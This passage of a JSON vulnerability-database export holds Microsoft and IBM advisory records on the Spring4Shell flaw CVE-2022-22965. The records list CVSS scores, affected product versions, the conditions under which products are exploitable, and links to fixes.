We have not to date noted any impact to the security of our enterprise services and have not experienced any degraded service availability due to this vulnerability.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-05T07:00:00", "type": "msrc", "title": "Microsoft\u2019s Response to CVE-2022-22965 Spring Framework", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-04-05T07:00:00", "id": "MSRC:68FA6D02FA64FF61F41A7B1A8E364197", "href": "/blog/2022/04/microsofts-response-to-cve-2022-22965-spring-framework/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-08T19:45:16", "description": "Summary Microsoft used the Spring Framework RCE, Early Announcement to inform analysis of the remote code execution vulnerability, CVE-2022-22965, disclosed on 31 Mar 2022. We have not to date noted any impact to the security of our enterprise services and have not experienced any degraded service availability due to this vulnerability. 
Threat analysis of the \u2026\n\n[ Microsoft\u2019s Response to CVE-2022-22965 Spring Framework Read More \u00bb](<https://msrc-blog.microsoft.com/2022/04/05/microsofts-response-to-cve-2022-22965-spring-framework/>)", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-05T23:41:01", "type": "msrc", "title": "Microsoft\u2019s Response to CVE-2022-22965 Spring Framework", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-04-05T23:41:01", "id": "MSRC:A49EE2D875C0E490BD326B3CDDB7399F", "href": "https://msrc-blog.microsoft.com/2022/04/05/microsofts-response-to-cve-2022-22965-spring-framework/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-14T15:26:47", "description": "This blog post is an abridged translation of Microsoft\u2019s Response to CVE-2022-22965 Spring Framework. Please refer to the original text for the latest information. Summary", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", 
"confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-05T07:00:00", "type": "msrc", "title": "Microsoft\u2019s Response to CVE-2022-22965 Spring Framework", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-04-05T07:00:00", "id": "MSRC:4016FF02733260CBC5200B5091666FD4", "href": "/blog/2022/04/microsofts-response-to-cve-2022-22965-spring-framework-jp/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "ibm": [{"lastseen": "2023-12-03T18:32:53", "description": "## Summary\n\nIBM Sterling Control Center is affected but not classified as vulnerable to a remote code execution in Spring Framework (CVE-2022-22965) as it does not meet all of the following criteria: 1. JDK 9 or higher, 2. Apache Tomcat as the Servlet container, 3. Packaged as WAR (in contrast to a Spring Boot executable jar), 4. Spring-webmvc or spring-webflux dependency, 5. Spring Framework versions 5.3.0 to 5.3.17, 5.2.0 to 5.2.19, and older versions. 
The fix includes Spring Framework 5.3.18.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2022-22965](<https://vulners.com/cve/CVE-2022-22965>) \n** DESCRIPTION: **Spring Framework could allow a remote attacker to execute arbitrary code on the system, caused by the improper handling of PropertyDescriptor objects used with data binding. By sending specially-crafted data to a Spring Java application, an attacker could exploit this vulnerability to execute arbitrary code on the system. Note: The exploit requires Spring Framework to be run on Tomcat as a WAR deployment with JDK 9 or higher using spring-webmvc or spring-webflux. Note: This vulnerability is also known as Spring4Shell or SpringShell. \nCVSS Base score: 9.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/223103](<https://exchange.xforce.ibmcloud.com/vulnerabilities/223103>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\n**Affected Product(s)**| **Version(s)** \n---|--- \nIBM Sterling Control Center| 6.2.1.0 \nIBM Sterling Control Center| 6.2.0.0 \n \n\n\n## Remediation/Fixes\n\n**Product**\n\n| \n\n**Version**\n\n| \n\n**iFix**\n\n| \n\n**Remediation** \n \n---|---|---|--- \n \nIBM Sterling Control Center\n\n| \n\n6.2.1.0\n\n| \n\niFix07\n\n| \n\n[Fix Central - 6.2.1.0](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7EOther%20software&product=ibm/Other+software/Sterling+Control+Center&release=6.2.1.0&platform=All&function=all>) \n \nIBM Sterling Control Center\n\n| \n\n6.2.0.0\n\n| \n\niFix17\n\n| \n\n[Fix Central - 6.2.0.0](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7EOther%20software&product=ibm/Other+software/Sterling+Control+Center&release=6.2.0.0&platform=All&function=all>) \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", 
"attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-25T22:33:00", "type": "ibm", "title": "Security Bulletin: IBM Sterling Control Center is affected but not classified as vulnerable by a remote code execution in Spring Framework (CVE-2022-22965)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-05-25T22:33:00", "id": "8EA98A1ACD7FB64C20AF5E150C5876B7A376F3920E71B4315AC3EAC3F292126E", "href": "https://www.ibm.com/support/pages/node/6589989", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-12-03T18:32:19", "description": "## Summary\n\nIBM Sterling Connect:Direct Web Services is affected but not classified as vulnerable to a remote code execution in Spring Framework (CVE-2022-22965) as it does not meet all of the following criteria: 1. JDK 9 or higher, 2. Apache Tomcat as the Servlet container, 3. Packaged as WAR (in contrast to a Spring Boot executable jar), 4. Spring-webmvc or spring-webflux dependency, 5. Spring Framework versions 5.3.0 to 5.3.17, 5.2.0 to 5.2.19, and older versions. CDWS using Spring boot to develop REST APIs. 
The fix includes Spring boot version-2.6.6.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2022-22965](<https://vulners.com/cve/CVE-2022-22965>) \n** DESCRIPTION: **Spring Framework could allow a remote attacker to execute arbitrary code on the system, caused by the improper handling of PropertyDescriptor objects used with data binding. By sending specially-crafted data to a Spring Java application, an attacker could exploit this vulnerability to execute arbitrary code on the system. Note: The exploit requires Spring Framework to be run on Tomcat as a WAR deployment with JDK 9 or higher using spring-webmvc or spring-webflux. Note: This vulnerability is also known as Spring4Shell or SpringShell. \nCVSS Base score: 9.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/223103](<https://exchange.xforce.ibmcloud.com/vulnerabilities/223103>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\n**Affected Product(s)**| **Version(s)** \n---|--- \nIBM Sterling Connect Direct Web Services| 1.0 \nIBM Sterling Connect:Direct Web Services| 6.1.0 \nIBM Sterling Connect:Direct Web Services| 6.2.0 \nIBM Sterling Connect:Direct Web Services| 6.0 \n \n\n\n## Remediation/Fixes\n\n**Product(s)**| **Version(s)**| **Remediation \n** \n---|---|--- \nIBM Sterling Connect Direct Web Services| 1.0| Apply 6.0.0.8, available on [Fix Central](<https://www.ibm.com/support/fixcentral/options?selectionBean.selectedTab=find&selection=ibm%2fOther+software%3bibm%2fOther+software%2fIBM+Connect%3aDirect+Web+Services> \"\" ) \nIBM Sterling Connect:Direct Web Services| 6.0| Apply 6.0.0.8, available on [Fix Central](<https://www.ibm.com/support/fixcentral/options?selectionBean.selectedTab=find&selection=ibm%2fOther+software%3bibm%2fOther+software%2fIBM+Connect%3aDirect+Web+Services> \"\" ) \nIBM Sterling Connect:Direct Web Services| 6.1| Apply 6.1.0.12, available on [Fix 
Central](<https://www.ibm.com/support/fixcentral/options?selectionBean.selectedTab=find&selection=ibm%2fOther+software%3bibm%2fOther+software%2fIBM+Connect%3aDirect+Web+Services> \"\" ) \nIBM Sterling Connect:Direct Web Services| 6.2| Apply 6.2.0.6, available on [Fix Central](<https://www.ibm.com/support/fixcentral/options?selectionBean.selectedTab=find&selection=ibm%2fOther+software%3bibm%2fOther+software%2fIBM+Connect%3aDirect+Web+Services> \"\" ) \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-07T05:50:15", "type": "ibm", "title": "Security Bulletin: IBM Sterling Connect:Direct Web Services is affected but not classified as vulnerable by a remote code execution in Spring Framework (CVE-2022-22965)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-06-07T05:50:15", "id": "D77134C81C99E57B976FD13B327D499D7859624EF6E1B9534595C21A83A1761B", "href": "https://www.ibm.com/support/pages/node/6592977", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-12-03T18:34:09", 
"description": "## Summary\n\nOperations Dashboard in Cloud Pak for Integration is affected by Spring4Shell CVE-2022-22965 with details below\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2022-22965](<https://vulners.com/cve/CVE-2022-22965>) \n** DESCRIPTION: **Spring Framework could allow a remote attacker to execute arbitrary code on the system, caused by the improper handling of PropertyDescriptor objects used with data binding. By sending specially-crafted data to a Spring Java application, an attacker could exploit this vulnerability to execute arbitrary code on the system. Note: The exploit requires Spring Framework to be run on Tomcat as a WAR deployment with JDK 9 or higher using spring-webmvc or spring-webflux. Note: This vulnerability is also known as Spring4Shell or SpringShell. \nCVSS Base score: 9.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/223103](<https://exchange.xforce.ibmcloud.com/vulnerabilities/223103>) for the current score. 
\nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nOperations Dashboard| 2020.4.1 \n2021.1.1 \n2021.2.1 \n2021.3.1 \n2021.4.1 \n \n\n\n## Remediation/Fixes\n\n**Operations Dashboard version 2020.4.1 in IBM Cloud Pak for Integration** \nUpgrade Operations Dashboard to 2020.4.1-8-eus using the Operator upgrade process described in the IBM Documentation \n<https://www.ibm.com/docs/en/cloud-paks/cp-integration/2020.4?topic=components-upgrading-operations-dashboard> \n \n**Operations Dashboard version 2021.1.1, 2021.2.1, 2021.3.1, and 2021.4.1 in IBM Cloud Pak for Integration** \nUpgrade Operations Dashboard to 2021.4.1-4 using the Operator upgrade process described in the IBM Documentation \n<https://www.ibm.com/docs/en/cloud-paks/cp-integration/2021.4?topic=capabilities-upgrading-integration-tracing>\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-27T14:59:37", "type": "ibm", "title": "Security Bulletin: Operations Dashboard in Cloud Pak for Integration is affected by Spring4Shell CVE-2022-22965", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": 
"NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-04-27T14:59:37", "id": "ED11CF0606100E816592CB9CC87F176EF4BB64094BA5B7978B3810737572EBA4", "href": "https://www.ibm.com/support/pages/node/6575447", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-12-03T18:31:54", "description": "## Summary\n\nRational Test Control Panel is affected but not vulnerable to a remote code execution in Spring Framework (CVE-2022-22965) as it does not meet all of the following criteria: 1. JDK 9 or higher, 2. Apache Tomcat as the Servlet container, 3. Packaged as WAR (in contrast to a Spring Boot executable jar), 4. Spring-webmvc or spring-webflux dependency, 5. Spring Framework versions 5.3.0 to 5.3.17, 5.2.0 to 5.2.19, and older versions. Spring is used in the Rational Test Control Panel web application. The fix includes a patched version of the affected spring-beans-4.3.22 library\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2022-22965](<https://vulners.com/cve/CVE-2022-22965>) \n** DESCRIPTION: **Spring Framework could allow a remote attacker to execute arbitrary code on the system, caused by the improper handling of PropertyDescriptor objects used with data binding. By sending specially-crafted data to a Spring Java application, an attacker could exploit this vulnerability to execute arbitrary code on the system. Note: The exploit requires Spring Framework to be run on Tomcat as a WAR deployment with JDK 9 or higher using spring-webmvc or spring-webflux. Note: This vulnerability is also known as Spring4Shell or SpringShell. \nCVSS Base score: 9.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/223103](<https://exchange.xforce.ibmcloud.com/vulnerabilities/223103>) for the current score. 
\nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nRational Test Control Panel component in Rational Test Virtualization Server| 9.2.1.1, 9.5, 10.0.2.1, 10.1.3, 10.2.2 \nRational Test Control Panel component in Rational Test Workbench| 9.2.1.1, 9.5, 10.0.2.1, 10.1.3, 10.2.2 \n \n* All versions prior to those shown are affected. Upgrade to the latest versions shown.\n\n \n\n\n## Remediation/Fixes\n\n 1. Verify the version of Rational Test Control Panel\n 2. Download the fix for your product from Fix Central. It can be obtained for either Rational Test Workbench or Rational Test Virtualization Server by selecting the product and relevant version before browsing for fixes. Select and download the fix pack named Rational-RTCP-<_product-name_>-<_product-version_>-CVE-2022-22965-ifix for your selected product.\n 3. Stop Rational Test Control Panel\n 4. Navigate to the existing Rational Test Control Panel installation \nThe default installation locations for these files are: \nWindows: `C:\\Program Files\\IBM\\RationalTestControlPanel\\` \nAIX, Linux, Solaris: `/opt/IBM/RationalTestControlPanel/`\n 5. Copy the contents of the \"usr\" directory as a backup\n 6. Unzip the downloaded fix into the `RationalTestControlPanel` directory, overwriting the existing files.\n 7. 
Start Rational Test Control Panel\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-16T17:10:46", "type": "ibm", "title": "Security Bulletin: Rational Test Control Panel component in Rational Test Virtualization Server and Rational Test Workbench is affected but not classified as vulnerable by a remote code execution in Spring Framework (CVE-2022-22965)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-06-16T17:10:46", "id": "0465751AC2B09E6749CD032D525B17660008B7BDE693E1A430E27B2E32A33438", "href": "https://www.ibm.com/support/pages/node/6595721", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-12-03T18:33:05", "description": "## Summary\n\nIBM Robotic Process Automation with Automation Anywhere is affected but not classified as vulnerable to a remote code execution in Spring Framework (CVE-2022-22965) as it does not meet all of the following criteria: 1. JDK 9 or higher, 2. Apache Tomcat as the Servlet container, 3. 
Packaged as WAR (in contrast to a Spring Boot executable jar), 4. Spring-webmvc or spring-webflux dependency, 5. Spring Framework versions 5.3.0 to 5.3.17, 5.2.0 to 5.2.19, and older versions. IBM Robotic Process Automation with Automation Anywhere control room is using Spring Framework 5.1.6 with JDK 11. The fix will upgrade Spring Framework version to 5.3.18.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2022-22965](<https://vulners.com/cve/CVE-2022-22965>) \n** DESCRIPTION: **Spring Framework could allow a remote attacker to execute arbitrary code on the system, caused by the improper handling of PropertyDescriptor objects used with data binding. By sending specially-crafted data to a Spring Java application, an attacker could exploit this vulnerability to execute arbitrary code on the system. Note: The exploit requires Spring Framework to be run on Tomcat as a WAR deployment with JDK 9 or higher using spring-webmvc or spring-webflux. Note: This vulnerability is also known as Spring4Shell or SpringShell. \nCVSS Base score: 9.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/223103](<https://exchange.xforce.ibmcloud.com/vulnerabilities/223103>) for the current score. 
\nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nIBM Robotic Process Automation with Automation Anywhere| 19.0 \n \n\n\n## Remediation/Fixes\n\nIBM strongly recommends addressing the Spring Framework issue by upgrading to fix pack 19.0.0.10.\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-19T16:14:28", "type": "ibm", "title": "Security Bulletin: IBM Robotic Process Automation with Automation Anywhere is affected but not classified as vulnerable by a remote code execution in Spring Framework (CVE-2022-22965)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-05-19T16:14:28", "id": "D259E621EF9ECC71F1E5CA25BD5CC4DDE78CFECBB5FC21F2E4BCB16169E0B602", "href": "https://www.ibm.com/support/pages/node/6587935", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-12-03T18:31:53", "description": "## Summary\n\nIBM Spectrum Conductor is affected but not classified as vulnerable to a remote 
code execution in Spring Framework (CVE-2022-22965) as it does not meet all of the following criteria: 1. JDK 9 or higher, 2. Apache Tomcat as the Servlet container, 3. Packaged as WAR (in contrast to a Spring Boot executable jar), 4. Spring-webmvc or spring-webflux dependency, 5. Spring Framework versions 5.3.0 to 5.3.17, 5.2.0 to 5.2.19, and older versions. IBM Spectrum Conductor includes Spring Framework related classes in the package. It impacts the ascd, WEBGUI and HostFactory components. The fix upgrades Spring Framework to 5.2.20.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2022-22965](<https://vulners.com/cve/CVE-2022-22965>) \n** DESCRIPTION: **Spring Framework could allow a remote attacker to execute arbitrary code on the system, caused by the improper handling of PropertyDescriptor objects used with data binding. By sending specially-crafted data to a Spring Java application, an attacker could exploit this vulnerability to execute arbitrary code on the system. Note: The exploit requires Spring Framework to be run on Tomcat as a WAR deployment with JDK 9 or higher using spring-webmvc or spring-webflux. Note: This vulnerability is also known as Spring4Shell or SpringShell. \nCVSS Base score: 9.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/223103](<https://exchange.xforce.ibmcloud.com/vulnerabilities/223103>) for the current score. 
\nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\n_**Affected Product(s)**_| _**Version(s)**_ \n---|--- \nIBM Spectrum Conductor| 2.4.1 \nIBM Spectrum Conductor| 2.5.0 \nIBM Spectrum Conductor| 2.5.1 \n \n \n\n\n## Remediation/Fixes\n\n**IBM strongly recommends addressing the vulnerabilities now by upgrading the following interim fixes in the table:**\n\n_**Products**_| _**VRMF**_| _**APAR**_| _**Remediation/Fix**_ \n---|---|---|--- \nIBM Spectrum Conductor| 2.4.1| P104680| \n\n[sc-2.4.1-build601166](<http://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/Other+software/IBM+Spectrum+Conductor+with+Spark&release=All&platform=All&function=fixId&fixids=sc-2.4.1-build601166&includeSupersedes=0> \"sc-2.4.1-build601166\" ) \n \nIBM Spectrum Conductor| 2.5.0| P104681| \n\n[sc-2.5-build601167](<http://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/Other+software/IBM+Spectrum+Conductor+with+Spark&release=All&platform=All&function=fixId&fixids=sc-2.5-build601167&includeSupersedes=0> \"sc-2.5-build601167\" ) \n \nIBM Spectrum Conductor| 2.5.1| P104682| \n\n[sc-2.5.1-build601169](<http://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/Other+software/IBM+Spectrum+Conductor+with+Spark&release=All&platform=All&function=fixId&fixids=sc-2.5.1-build601169&includeSupersedes=0> \"sc-2.5.1-build601169\" ) \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-20T02:10:14", "type": "ibm", "title": "Security Bulletin: IBM Spectrum Conductor is affected but not 
classified as vulnerable by a remote code execution in Spring Framework (CVE-2022-22965)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-06-20T02:10:14", "id": "78AC818528F1ED5E96DF9765AA477784E752DB03E5EC0169C89AD690326E3F5F", "href": "https://www.ibm.com/support/pages/node/6596867", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-12-03T18:35:15", "description": "## Summary\n\nIBM Maximo For Civil infrastructure is affected but not classified as vulnerable to a remote code execution in Spring Framework (CVE-2022-22965) as it does not meet all of the following criteria: 1. JDK 9 or higher, 2. Apache Tomcat as the Servlet container, 3. Packaged as WAR (in contrast to a Spring Boot executable jar), 4. Spring-webmvc or spring-webflux dependency, 5. Spring Framework versions 5.3.0 to 5.3.17, 5.2.0 to 5.2.19, and older versions. The fix includes Spring Boot 2.6.6 that depends on Spring Framework 5.3.18.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2022-22965](<https://vulners.com/cve/CVE-2022-22965>) \n** DESCRIPTION: **Spring Framework could allow a remote attacker to execute arbitrary code on the system, caused by the improper handling of PropertyDescriptor objects used with data binding. By sending specially-crafted data to a Spring Java application, an attacker could exploit this vulnerability to execute arbitrary code on the system. 
